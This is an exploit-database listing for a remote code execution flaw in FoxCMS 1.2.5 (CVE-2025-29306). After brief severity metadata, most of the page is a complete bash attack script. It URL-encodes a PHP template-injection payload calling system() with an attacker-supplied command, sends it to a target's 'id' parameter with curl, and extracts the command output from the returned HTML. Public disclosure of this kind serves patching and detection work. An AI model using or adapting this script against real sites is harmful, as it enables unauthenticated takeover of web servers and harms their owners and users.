Exploit Details
Basic Information
| Exploit Title | FoxCMS 1.2.5 – Remote Code Execution (RCE) |
|---|---|
| Exploit ID | EDB-ID:52267 |
| Type | exploitdb |
| Published | 2025-04-19T00:00:00 |
| Modified | 2025-04-19T00:00:00 |
CVSS Information
| CVSS Score | 9.8 |
|---|---|
| Severity | CRITICAL |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
CVE Information
- CVE-2025-29306
Exploit Description
Exploit Code
# Exploit Title:
# Exploit Author: VeryLazyTech
# Vendor Homepage: https://www.foxcms.org/
# Software Link: https://www.foxcms.cn/
# Version: FoxCMS v.1.2.5
# Tested on: Ubuntu 22.04, Windows Server 2019
# CVE: CVE-2025-29306
# Website: https://www.verylazytech.com
#!/bin/bash
banner() {
cat <<'EOF'
______ _______ ____ ___ ____ ____ ____ ___ _____ ___ __
/ ___\ \ / / ____| |___ \ / _ \___ \| ___| |___ \ / _ \___ / / _ \ / /_
| | \ \ / /| _| __) | | | |__) |___ \ __) | (_) ||_ \| | | | ‘_ \
| |___ \ V / | |___ / __/| |_| / __/ ___) | / __/ \__, |__) | |_| | (_) |
\____| \_/ |_____| |_____|\___/_____|____/ |_____| /_/____/ \___/ \___/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ ‘__| | | | | | / _` |_ / | | | | |/ _ \/ __| ‘_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
@VeryLazyTech – Medium
EOF
}
# Call the banner function
banner
set -e
# Check for correct number of arguments
if [ “$#” -ne 2 ]; then
printf “Usage: $0
exit 1
fi
TARGET=$1
# Encode payload
ENCODED_CMD=$(python3 -c “import urllib.parse; print(urllib.parse.quote(‘\${@print_r(@system(\”$2\”))}’))”)
FULL_URL=”${TARGET}?id=${ENCODED_CMD}”
echo “[*] Sending RCE payload: $2”
HTML=$(curl -s “$FULL_URL”)
# Extract
- from known XPath location using xmllint
UL_CONTENT=$(echo “$HTML” | xmllint –html –xpath “/html/body/header/div[1]/div[2]/div[1]/ul” – 2>/dev/null)
# Strip tags, clean up
CLEANED=$(echo “$UL_CONTENT” | sed ‘s/<[^>]*>//g’ | sed ‘/^$/d’ | sed ‘s/^[[:space:]]*//’)
echo
echo “[+] Command Output:”
echo “$CLEANED”